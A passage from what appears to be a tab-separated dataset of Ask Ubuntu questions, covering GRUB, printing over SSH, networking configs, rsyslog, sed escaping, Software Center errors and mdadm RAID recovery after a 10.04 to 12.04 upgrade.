to get grub up and running . but i am getting this error : /usr/sbin/grub-probe : error : can not find a device for /boot/grub ( is /dev mounted ? ) . can anyone please guide me in the right direction ? the current ubuntu installation is far too customized to my needs to lose it to a boot manager issue ! any help is much appreciated !
186460	source code for layout based switcher in kde ?	i want to take a look at the source code for the layout based switcher . i know how to use apt-get source < packagename > to pull source , my problem is kde has an awful lot of packages , and i 'm not sure in which one to look . the layout based switcher looks like this :
186462	ssh tunnel to a remote cups server	there is a cups server beyond a firewall and i 'd like to use it 's printers . i have ssh access to computers that can access the cups server , and can get at the servers web interface by forwarding say port 1631 . i can not forward port 631 as i 've not got root access to anything on the servers network . in ubuntu 's 'printing ' control panel , i can enter the address of a server , but i 've not been able to connect through the forwarded port ( localhost:1631 , which is forwarded to the remote cups server 's 631 port ) . any ideas ?
186464	how to bind multiple commands	we all have to use ls |more and also some other commands . so i just need info is there a way to bind multiple commands together like i want to bind ls|more together.so when i simply pass ls command it should display some data and wait for user to press key ( space bar ) to show rest of the data . is it possible in linux ? ? ? ? ?
186465	swap front panel audio channels only	does anyone knows how to swap the channels of the front panel audio only . i found some solutions to swap left-right in general . but my problem is , that the output from the backward jack is correct and the front panel audio is reversed .
186466	can i safely reinstall pcmanfm in lubuntu desktop ?	i seem to have some problems with pcmanfm ( openbox took over my desktop ) and i would like to reinstall in synaptic but it says it wants to remove ( reinstall eventually ) lubuntu-core , lubuntu-default settings and lubuntu-desktop . is that safe ? after installing lxde and lxde-core , uninstalling pcmanfm involves removing them too .
186467	gui download manager needed for ubuntu 12.04	what is the best gui downlaod manager ? i need something that looks like idm for windows
186472	what method do i use to manage an app-specific background process ?	i am developing an application with different behavior depending on the arguments : '' -config '' starts a gtk window to change options , start and close the daemon . `` -daemon '' starts a background process that does something every x minutes . i already know how to use fork/system/exec etc ... but i would like to know the main logic of such application to : restart or refresh the daemon when configuration change . keep only one instance of the daemon . i have read that killing the daemon to restart it is not a clean way to do . how other applications do ? ( ubuntuone , weather forecast , rss feed working with notification area ) thanks for your help . ps : i do n't want to create a system-wide daemon , just a user application with a background process .
186487	how to ensure that all new users have the same profile settings as the current user ?	how to ensure that all new users have the same profile settings as the current user ? i am using ubuntu 12.04 .
186494	remove wine 's notepad from `` open with '' options	a few facts : i use wine . wine ships its own version of notepad . for some files , this copy of notepad has somehow become associated . there is no possibility of me ever actually wanting to open anything in notepad . i figure i could try and find out what notepad is associated with and re-associate that with my editor of choice but that seems deeply tedious . is there any global way to stop notepad existing as a method for opening files ?
186497	search through all lenses	currently i 'm using ubuntu 12.04 with some additional lenses . is it possible to search though all lenses at the same time ? for example when i type `` tom '' it looks for all calendar events ( through calendar events lenses ) , all empathy contacts and all music titles contains this string . please advice me , how to do that ?
186498	the remote computer was reboot and i ca n't go in its autorun teamviewer	the remote computer has a login/password and i want to save its procedure . teamviewer is running from autorun programs on a remote machine and gives me free access , but it does not start until the remote user logs in . how can i solve it ? ubuntu 12.04
186503	window stuck out side desktop	one of my windows is stuck out side the desktop area . i can see a bit of it but can not see enough to to drag it back . anyone know another way to move it ? as you can see i cant get to the left side or top of the window please help .
186505	how do i remove ubuntu without losing any data from the hdd ?	i 've installed the newest version of ubuntu but now i want to get back to my windows but when i reach the screen with windows boot manager , like this ... ( this is a screenshot from the installation guide ) ... i ca n't use the keyboard to highlight windows so i ca n't access windows to uninstall ubuntu . if i use the windows installation cd , it erases all the data on my hard disk ? and if so , what other thing can i do to remove ubuntu and without losing all my datas ? please answer as soon as possible , thank you in advance !
186509	how do i make a custom right click command for nautilus ?	i 'm trying to make a mark as executable command for the right click in nautilus for a faster work flow . i came up with this script : # ! /bin/bash for file in $ nautilus_script_selected_file_paths ; do gksudo `` chmod +x $ file '' & done how do i get this to work though . i currently have a .sh file and have no idea where to put it .
186515	vim-tiny renamed ?	why is the vim-tiny package renamed to vim.tiny once it is installed ? /usr/bin/vim.tiny just curious about naming conventions in ubuntu -- do many packages change names when installed ?
186516	how to set up wi-fi hotspot for sharing using 2 wired and 1 wi-fi network cards ?	i have 3 network cards installed in my ubuntu 10.04 server and i want to configure internet sharing and file sharing on eth1 for wired users and wlan0 for wireless users . static ip : eth0 : 192.168.1.1 eth1 : 10.0.0.15 wlan0 : 10.0.0.20 /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth0 iface eth0 inet static address 192.168.1.15 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 # the secondary network interfaces auto eth1 iface eth1 inet static address 10.0.0.15 netmask 255.0.0.0 network 10.0.0.0 broadcast 10.255.255.255 auto wlan0 iface wlan0 inet static address 10.0.0.20 netmask 255.0.0.0 network 10.0.0.0 broadcast 10.255.255.255 i have use squid and dansguardian for internet configured i have configure following in hostapd /etc/hostapd/hostapd.conf with wpa authentication options . 01 interface=wlan0 02 driver=nl80211 03 ssid=dontmesswithvincentvalentine 04 hw_mode=g 05 channel=6 06 macaddr_acl=0 07 auth_algs=1 08 ignore_broadcast_ssid=0 09 wpa=3 10 wpa_passphrase=keepguessing 11 wpa_key_mgmt=wpa-psk 12 wpa_pairwise=tkip 13 rsn_pairwise=ccmp dhcp server also configured ( /etc/dhcp3/dhcpd.conf ) ddns-update-style none ; ignore client-updates ; authoritative ; option local-wpad code 252 = text ; subnet 10.0.0.0 netmask 255.255.255.0 { # -- - default gateway option routers 10.0.0.15 ; # -- - netmask option subnet-mask 255.255.255.0 ; # -- - broadcast address option broadcast-address 10.0.0.255 ; # -- - domain name servers , tells the clients which dns servers to use . option domain-name-servers 10.0.0.15 , 127.0.0.1 , 192.168.1.1 ; option time-offset 0 ; range 10.0.0.21 10.0.0.30 ; default-lease-time 1209600 ; max-lease-time 1814400 ; } /etc/default/dhcp3-server interfaces= '' eth1 wlan0 '' i have enable packet forwarding for ipv4 and ipv6 ( /etc/sysctl.conf ) net.ipv4.ip_forward = 1 net.ipv6.conf.all.forwarding = 1 /etc/rc.local iptables -t nat -a prerouting -i eth1 -p tcp -- dport 80 -j redirect -- to-port 8080 iptables -t nat -a postrouting -o eth0 -j masquerade the client pc are able to receive internet sharing on eth1 and also dhcp address and ping the other network . from wlan to client pc are able to receive dhcp address but are not able to ping to 10.0.0.20 through which they are receivng dhcp address or any other pc in the network my firewall is also not enable . what can be the problem why the wireless lan users are not able to ping or communicate want to configure as a firewall plus router through which can share internet to cable connected user as well as wireless user .
186520	unity launcher send to back feature	clicking on a running application 's icon in the unity launcher it brings the application to the front . this is similar behavior to the old gnome taskbar except that in the old taskbar if i clicked a second time the window would be sent back to where it was in the front/back hierarchy . is this possible in unity ? elaboration just to be clear : i have four programs open firefox tasks thunderbird nautilus firefox it topmost , below it is tasks , and below that is thunderbird and at the bottom ( or back ) is nautilus if i 'm currently using firefox and i want to quickly check on my tasks i can click the tasks icon in the launcher and this window is brought to the front . tasks firefox thunderbird nautilus however , having checked this i now want to go back to what i was doing on firefox . i used to be able to click the icon in the taskbar again to achieve this . firefox tasks thunderbird nautilus this is not the case in unity . i have to move my mouse to the firefox icon in the launcher to go back to firefox . clicking the tasks icon again does nothing . i 'd like this old functionality duplicated in unity as it was a handy feature . can anyone tell me if this is possible now or will be in the future ?
186522	how to make a good partition ?	i installed ubuntu and everything was going fine , then one day , suddendly , at the start-up it was written : `` error : no such device grub rescue '' . no way to do anything . how can i fix this ?
186524	the best practice to backup a system	i have installed ubuntu 12.04 on my virtual machine [ virtualbox ] and i want to do some modifications in it . but i ca n't predict how it can influence on my system . what it the best practice to backup it ? it 's clear that i can just backup my virtual machine but i do n't know if it 's a good practice ?
186527	how can i see what version of pcmanfm i 'm running ?	i have a problem with pcmanfm ( not accessible etc ) . i think this is related to the fact that i had installed a 1.0 version , then purged and reinstalled but now i can not tell what version i am using , while the initial problem is not yet solved..
186532	why xemacs looks like this ?	on a fresh ubuntu 12.04 xemacs looks like this where as emacs looks like this xemacs also produces the following warnings : warning : can not convert string `` -*-helvetica-bold-r-*-*-*-120-*-*-*-*-iso8859-* '' to type fontstruct warning : missing charsets in string to fontset conversion how can i fix this ?
186544	ubuntu 11.04 is not opening	i am using ubuntu 11.04 with windows 7 . ubuntu was working nice but now when i choose ubuntu 11.04 from boot loader , it is not opening . just purple screen is coming but then nothing change . i ca n't see login menu , it does n't pass to the login menu . what should i do ? has anyone this problem ? thanks for your answer . i did the steps you wrote frantique . but now i have a black screen and then nothing . when i choosed ubuntu 11.04 from bootloader , first purple screen is opening then after 1 second it is going to a black screen . and i have nothing again . i ca n't write anything . just i have a black screen . it is not openining . before those problems they work together nice . there are n't any errors . lets i tell you what did i change : i installed docky , and theme of macosx . they were working nicely . and i tried to install a nice calendar . to do this installation i changed a litle bit the file sources.list . that calendar program was working succcesfully too , after installation . the theme macosx was working succesfully there were n't any problem . after some days maybe meeks i had that problem which i asked in the above . now when i tried to update i have a lots of errors . like : failed to urls ... ca n't access archive something ... ... . failed to urls ... ca n't access archive something ... ... . ... .. failed to urls ... ca n't access archive something ... i hope you will solve the problem . i want my macosxubuntu back : )
186545	how to buy videos , ebooks , music at ubuntu ?	what 's the solution for that ? the amazon kindle reader is only for windows and mac , f端r linux there 's only a mp3 downloader from amazon , but only for older systems and 32-bit . is there something similar to itunes for ubuntu ?
186546	can gnome terminal set wm_urgent ?	i 'd like for gnome terminal to set the wm_urgent window manager hint on bell . is this possible ? this bug report suggests it 's not but does anyone know another way . basically i 'm running xmonad under gnome and have xmobar set to display hidden workspaces with windows that have that hint set ( i.e . for new emails ) . that part of the functionality works because i can use this while running mutt under urxvt ( which does set this hint ) but i 'd like to use gnome 's terminal as my default terminal .
186552	using grep to find a string	i am trying to locate a file that ( should ) contains the string `` 1896.345 '' , somewhere under /home/dir/ . any ideas of how i can do it ? thanks
186555	how to delete the history of a specific user in empathy ?	in empathy , when you go to history , you have the option to delete all history and not for only a specific user . how to delete the history of a specific user in empathy people nearby account with preserving the history of other users ?
186561	how can gnome based applications such as rhythmbox use a proxy	i happen to be using xubuntu but i dont think the desktop-environment is applicable in this context . i noticed that some gnome-based applications such as rhythmbox can not fetch any information from the internet if the corporate network is using a proxy . in this particular scenario - the cover-art search facility of rhythmbox can not find coverart sought from the various providers on the internet . i 've tried the usual tricks such as setting *http_proxy* and running rhythmbox from the terminal , but this does not seem to work . how can a proxy be set for the whole xubuntu system ? any ideas ?
186564	recommended specs for 12.04 ?	i want to set up ubuntu in a virtualbox virtual machine . because this is a virtual machine , i specify exactly how much ram and video ram the virtual machine gets . i am looking for recommended specs for ubuntu 12.04 . i 've found specs for minimum requirements , but i want to have a nice experience , so i do n't want to give it just the bare minimum . however , since this is a virtual machine , i do n't want to give it more than it will use , since it will be running alongside other programs on my computer . where can i find recommended specs for ubuntu 12.04 ?
186567	is there a recommended ppa for ghostscript 9 on 10.04 ?	recently we keep receiving pdfs that hang ghostscript at 100 % cpu when printed . since at the office we are still on lucid , i tried printing those same pdfs from a precise vm as a test , and they work nicely . sadly we ca n't migrate right now to precise , so i was thinking of upgrading just ghostscript ( lucid has 8.71 while precise 9.x ) , is there a ppa i could use ?
186568	ubuntu one instruction for syncing of large ammount of data	i have a problem , i wish to sync about 20gb of documents and other files between computers . i have buyed extra space and now have 45 gb so i can have space if it grows . i have started ubuntu one on both mashines my laptop , ubuntu 12.04 and desktop with ubuntu 11.10 both 64bit i needed data on my laptop faster then ubuntu one could deliver them there via ubuntu one server . so i used filezilla to sincronize them while ubuntu one was running on both mashines . what happend is that ubuntu one started to make subfolders with folders an example my laptop has folder /home/username/folder1 with all empty subfolders and no files in them and now it has a folder /home/username/folder1/folder1 which is syncing with desktop mashine now the files from laptop come to desktop via ubuntu one server . and keep makeing folder on desktop /home/username/folder1/folder1 with files form laptop i suspect . laptop is not receveving any files that are directly desktop folders , so has folder /home/username/folder1 with all empty subfolders and no files in them . on one.ubuntu.com all folder and files look normal like on my desktop i have waited for about a week for it , it seems this problem will not go away without some help . can anyone help me understand what happend ?
186571	sudden shutdown - desktop computer	i have a problem with ubuntu 12.04 . it shuts down randomly , just power off . i changed the powersupply and it still happens . i have a new computer with asus p9x79 pro motherboard and intel cpu core i7-3930k . the cpu is water cooled so there is no problem with high temp . power supply has max at 750w and graphic card is not power-hungry ( quadro 600 ) . any suggestions ?
186578	how can i change my keyring password from the command line	i 'm having trouble with my screen freezing , and i think it may be due to the login keyring . right now , it 's asking for a new keyring ( i deleted the old one ) , but the screen is unresponsive . the only way i can access anything is through a root shell at startup . how can i set the keyring from the command prompt ?
186579	rsyslog inconsistent logging of hostnames vs ip 's	after upgrading our syslog ( rsyslog ) server from 10.04 to 12.04 , rsyslog does n't register hostname for 10-20 % of the clients , just ip 's . these clients were logged properly with hostnames prior to upgrading to 12.04 . anyone else experienced this ? and perhaps have a remedy ? thanks .
186585	coreldraw x3 file with 12 pages want to open in ubuntu 10.04	i have one coreldraw x3 file , which has a 12 pages , i want to open in ubuntu 10.04 . please give me a solution if any have ?
186586	how can i make thunderbird marks the indicators envelope blue ?	upgraded from 10.04 to 12.04 now i do n't have notifications on incoming email to thunderbird on the indicator bar , neither when thunderbird is running nor when it 's not . none of the other similar questions answers have helped me . still no blue envelope . i do get a notification when the email comes as a temporary osd , ut the envelope in the indicators menu does not get blue and there is no line for received email under `` mail '' althougth it is working for google mail .
186587	ca n't center dialog window above main window when using glade ( quickly )	i have a dialog opening when i press a button in my application and i want it to center above the application 's main window , but i ca n't find a way to do this . i 'm using quickly ( python ) and glade . in glade i 've tried the following settings : window type = popup modal = yes window position = center on parent but i simply ca n't get the behaviour i 'm after . when using the `` window type '' option `` top level '' the dialog opens in the center of the screen . when i use `` window type '' = `` popup '' it opens in the very top left corner , with the window controls unaccessible . i know this must be a very basic setting but i 've just started developing with gtk and python so i obviously managed to miss this . thanks for any advice ! : )
186590	bare-metal mode for ubuntu	i 'm interested to benchmark a console-mode application , and would like to reduce to a minimum any interferences from other processes in the system . is there an easy way to boot into ubuntu 12.04 in a `` bare-metal '' mode ? i 'm still interested in casually booting a `` desktop '' version of ubuntu ( so will prefer to avoid permanent changes ) , and would like to avoid installing a separate ubuntu-server version . my use-case is the following - application is single-thread and console-mode only . test-box has 12gb of memory . i ssh into the test-box . seems i can skip at least unity , x-server and their dependents .
186592	how do i configure rsyslog to send logs from a specific program to a remote syslog server ?	i have a program which outputs to syslog with a given tag/program name . i 'd like to be able to filter syslog traffic from that program and send it to a remote syslog server , leaving all other syslog traffic local . i can send all traffic to the remote server with * . * @ remote_server how do i filter it ?
186597	reinstall paid software from usc in kubuntu	i 've bought psychonauts via usc some time ago . i 've switched to kubuntu now and want to reinstall the game . whats the best way to do so , without installing too many otherwise unnecessary packages ?
186600	ubuntu get stuck on boot	it seems that i ca n't install any os on my system , ubuntu , mint , fedora or mac osx except windows , it just stuck on ubuntu logo , or a little bit later and the same thing happened to fedora and mint . i tried to install this on my laptop and it worked , so the disc is n't the problem . i tried to change to ahci instead of ide as suggested to me before but still no success . pc specs : asus p6t deluxe i7 940 580 gtx 12g
186606	apt-get install - how to get report about failed installs ?	i 've created my script to install software on a new computer . basically it includes lot 's of apt get install < pkg name > -y lines . how can i get a short report about installs that has failed ? is there a function like that in bash ?
186610	how do i upgrade to postgres 9.2 ?	just recently , i 've read that postgresql 9.2 is released . my ubuntu 12.04 has postgresql 9.1.5 installed . how can i update to 9.2 version ? i tried apt-get update and apt-get upgrade but no updates for postgresql .
186613	high quality videos are jittery on ubuntu 12.04	this is a pretty new install . i have activated ati drivers ( some reason the post release updates one wo n't download ) and i have vlc . my computer can handle hd videos fine , and they run flawlessly on my windows partition . the videos seem to be stuttering , it may not be restricted to hd videos . oh yes i was getting bad screen tearing , so i turned the 'tear free ' option on . edit : yeah disabling 'tear free ' seems to fix this . but then i 'm stuck with screen tearing in the videos ?
186618	can not access wireless on my acer gateway ne56r laptop . however wired connection works perfectly fine	i am new to linux world . i am using ubuntu 10.4 i am using gateway acer ne56r laptop . and i can not connect my laptop to internet wirelessly . could n't find any trail for a wireless connection either . can someone please help ! !
186622	how to configure proper video-player video output for unichrome-pro card ?	after upgrade to 12.04.1 from 10.04 , all video players yield blank screen . vlc has been made to show video properly by setting its video output to `` x11 ( xcb ) '' while it was set to `` xvideo ( xcb ) '' by default . how can i do the same with totem and pitivi ? video card is `` via s3 unichrome pro ''
186623	what network manager to use for the xfce4 panel to see my current conection state ?	i have installed xubuntu desktop on top of initial lubuntu 12.04 installation . how can i select between the wireless networks and how to see the app in the panel ? i used xfce in the past but i do not remember how to add it ( i had it by default then i guess ) i have installed wicd and added it in a launcher it says `` without system tray icon '' . but i 'm thinking about exactly that : a systray `` live '' icon/applet for the panel that i 'm missing for the moment in xfce . it is the most common thing , present by default in all ubuntu flavors - even booting from live cd displays it how can i have that in xfce panel ? ( wicd is excellent but i still want to see `` live '' any changes to my connection . ) update : i have noticed that after installing wicd i have a `` live '' wicd systray icon in lubuntu/lxde ( lxpanel ) but i do n't have that in xubuntu/xfce/xfce4-panel
186626	translator offline for ubuntu and free dictionaries , which of them ?	i 'm looking for a offline translator for ubuntu 12.04 . i like goldendict , but i ca n't find dictionaries . i have looked for them on google a lot but i ca n't find anything . i know about babylon dictionaries ( .bgl ) ; i 've downloaded some of them from babylon website but it 's a .exe file . i 've tried every app to extract it ( 7zip , rar , ark , etc . ) and finally i succeeded but there were no .bgl files in the archive . i 've also downloaded free dict from repository but they are not good for what i 'm looking for ( italian-english , english-italian ) . do you advice another app ? or , if you think that goldendict is the best , do you know any sites to download dictionaries for goldendict ( also ita-eng , eng-ita ) ?
186627	how to place custom icons ( not emblems ) on folders in thunar	( this is not a duplicate as this question describes how to add custom icons to folders in nautilus , whereas there seems to be no explanation for thunar . ) in nautilus ( as this questions shows ) there is the fun feature of being able to place any custom icon onto a folder by just right clicking the folder , clicking the folder in the menu that comes up and selecting a custom icon . however in thunar i can only seem to add emblems ( see the screenshot below ) and not actual custom icons ( i have a folder of them scaled to the right sizes ready to use ) . i have looked round the thunar settings and general xfce settings-editor but have not been able to see a way of setting a custom icon on a folder . this question only describes how to add a custom emblem in thunar , which is different . my home folder in thunar with emblems but not custom icons :
186630	i recreated my root partition using fdisk ( resized it ) , but now the filesystem is corrupt	i was under the impression that i could resize my root partition , recreate it using fdisk but only larger . and then reboot , and do an online filesystem resize with resize2fs . however , that doesnâ´t seem to be the case . now i canâ´t mount my partition that is running ext4 . any suggestions on how i should proceed on recovering the partition ?
186631	dragon age : origins with playonlinux have low fps	i successfully installed dragon age : origins with playonlinux on my ubuntu 12.04 but the game is too slow , frame per second ( fps ) is too low . i played this game so many times in windows with the high graphic settings , so my hardware is enough . what is the problem , why it 's slow , and what can i do to improve performance ?
186636	how to change the default wallpaper on the custom livecd ?	i am trying to customize an 11.10 livecd . everything is working great , except i can not figure out how to change the default wallpaper . which configuration file ( s ) do i need to edit ?
186639	unable to launch ubuntu software centre	2012-09-11 13:19:00,379 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-09-11 13:19:00,389 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-09-11 13:19:00,714 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2012-09-11 13:19:00,914 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2012-09-11 13:19:00,950 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 149 , in open self._list.read_main_list ( ) systemerror : e : malformed line 5 in source list /etc/apt/sources.list ( dist parse ) 2012-09-11 13:19:02,875 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__'
186646	how to use driver for printer ?	i 've been trying to get my lexmark x1290 to work on ubuntu 12.04 . according to this post , the z600 driver should work to print , so i downloaded the z600 driver from here and installed it through the ubuntu software center . i plugged in my printer and went to the `` printer '' section under system settings ... and followed the wizard to install it . it showed up as `` 1200-series '' but never gave me a choice to choose the driver and when i try to print to it , it pops up a message that it is printing and then that it is done printing , but it is definitely not printing anything . what am i doing wrong here ?
186647	ssh forwarding error	i have some issues regarding ssh and i am unable to solve . i have completed bootstrap and node status is 1 node allocated to maas , now when i do juju status , it says invalid ssh key , hostname can not be found error . .. i then went to /etc/hosts file and i changed 127.0.0.1 localhost to my 127.0.01 node1 now it gives me , error ssh forwading error : @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ i also have run the node after bootstrap and it gives ssh key .. i didnt added any ssh key in my dashboard of maas . secondly i want to ask how can i make more nodes allocated to root ? do i have to rewrite the maas-oauth portion in environment with another api key . kindly reply asap ... .
186649	\t string with sed	i 'm using sed to replace the string `` \upo '' by the string `` \textit { old ( user 's preferences ) } '' . the command i 'm using is : find /home/rom/desktop/noderemoval/report -name \*.tex -exec sed -i `` s/\\upo/\\textit { old ( user 's preferences ) } /g '' { } \ ; i want to escape the backslashes as they are part of the string . but instead of a backslash it gives me a tab ! the output is : \ [ tab ] extit { old ( user 's preferences ) } what 's wrong ? thanks in advance , rom
186656	what is the broadcast account ?	under the notification envelope , there is something called `` set up broadcast account ... '' . i 've looked all over and ca n't find anything about it . what is it and what is it for ? thanks
186662	existing partitons not recognized during installation	i 've got a windows 8 ( final version , no preview ) installed in my pc . now i wanted to install ubuntu like i 've done a thousand times before . strange thing is , gparted ( started from live usb-stick ) sees my system disk as completely unallocated although it has one huge ntfs partition with windows 8 on it . so i booted into windows again and used the disk management tool to shrink that partition and create a new one in the free space . i formated that one to fat32 . i still got the same behavior in gparted . does anyone have an idea ? my harddisk is a samsung 830 series ssd and the mainboard has uefi . edit tried a 12.10 beta1 stick now . it tells me that the volume contains gpt signatures and maybe was corrupted by a program that does n't understand . with this new information i found this but am not really sure what to do .
186664	installing creative nx webcam	i want to install my creative nx webcam on ubuntu 12.04 lts . the installation cd is for windows . support for this product does n't exist anymore on creative site . how to install it on ubuntu ? thanks for your help .
186666	mdadm fails after 10.04 - > 12.04 upgrade	i just upgraded my ubuntu server ( in the role of nas ) from 10.04 to 12.04 . since both are lts versions i did n't expect any issues and ... did n't make any backups . my bad . after upgrade , the server did n't come up , grub rescue greeted me . originaly i had 4 raid arrays : one , 10gb for system /dev/md0 , was assembled from /dev/sd [ bcdef ] 1 in raid1 mode . second , 10gb for cache , /dev/md1 , was assembled from /dev/sd [ bcdef ] 2 in raid1 ( ? ) mode . third , /dev/md5 , was assembled from /dev/sd [ bcdef ] 6 in raid5 mode . all partitions 500gb each . last , /dev/md6 , was assembled from /dev/sd [ bcdef ] 5 in raid6 mode . all partitions 500gb each . since i do n't have 5tb ( or even 3.5tb ) of mediums to make a backup , i installed a clean ubuntu server system on /dev/sda using minimal cd . i was n't able to boot eighter , but it could be fault on part of my hardware , which is quite dated and does n't have the option to boot from different hard drive . so i run xubuntu live cd , and from it i was able to mount one of the system partitions , and made a full backup of system files . then i installed the 12.04 on properly recognized during setup /dev/sd [ bcdef ] 1 raid1 . unfortunately , the system actually installed solely on /dev/sde1 , ignoring the raid layout . after that , the system did n't boot eigher . afraid to touch anything more , i grabbed the xubuntu live cd again , and from it i could muster the following diagnostic data . i am interested in recovering only /dev/md5 and /dev/md6 . it looks , like the installer messed with the superblocks on /dev/sde . i hope it is not fatal ... # sudo /usr/share/mdadm/mkconf ... # definitions of existing md arrays array /dev/md124 uuid=01b9a5fe:1be857d7 : c20db638:73a0ec38 array /dev/md127 uuid=00000000:00000000:00000000:00000000 spares=2 array /dev/md/6 metadata=1.2 uuid=2a8fd2df:3ad53552 : e8b80ecf : a46d93a2 name=pieciodysk:6 array /dev/md/5 metadata=1.2 uuid=a3945c40:73237cd6:3d61998e:8f773d03 name=pieciodysk:5 array /dev/md127 uuid=00000000:00000000:00000000:00000000 spares=4 array /dev/md/6 metadata=1.2 uuid=2a8fd2df:3ad53552 : e8b80ecf : a46d93a2 name=pieciodysk:6 spares=4 array /dev/md/5 metadata=1.2 uuid=a3945c40:73237cd6:3d61998e:8f773d03 name=pieciodysk:5 spares=4 fdsik /dev/sdb : disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c3e8a device boot start end blocks id system /dev/sdb1 * 2048 19531775 9764864 fd linux raid autodetect /dev/sdb2 19531776 21485567 976896 fd linux raid autodetect /dev/sdb3 21485568 1953510662 966012547+ 5 extended /dev/sdb5 21485631 987490082 483002226 fd linux raid autodetect /dev/sdb6 987490146 1953510662 483010258+ fd linux raid autodetect fdsik /dev/sdc : disk /dev/sdc : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 * 63 19535039 9767488+ fd linux raid autodetect /dev/sdc2 19535040 21494969 979965 fd linux raid autodetect /dev/sdc3 21494970 1953520064 966012547+ 5 extended /dev/sdc5 21495033 987499484 483002226 fd linux raid autodetect /dev/sdc6 987499548 1953520064 483010258+ fd linux raid autodetect fdsik /dev/sdd : disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdd1 * 2048 19531775 9764864 fd linux raid autodetect /dev/sdd2 19531776 21485567 976896 fd linux raid autodetect /dev/sdd3 21485568 1953510662 966012547+ 5 extended /dev/sdd5 21485631 987490082 483002226 fd linux raid autodetect /dev/sdd6 987490146 1953510662 483010258+ fd linux raid autodetect fdsik /dev/sde : disk /dev/sde : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sde1 * 63 19535039 9767488+ fd linux raid autodetect /dev/sde2 19535040 21494969 979965 fd linux raid autodetect /dev/sde3 21494970 2930272064 1454388547+ 5 extended /dev/sde5 21495033 987499484 483002226 fd linux raid autodetect /dev/sde6 987499548 1953520064 483010258+ fd linux raid autodetect /dev/sde7 1953520128 2930272064 488375968+ 83 linux fdsik /dev/sdf : disk /dev/sdf : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3743db4a device boot start end blocks id system /dev/sdf1 63 19535039 9767488+ 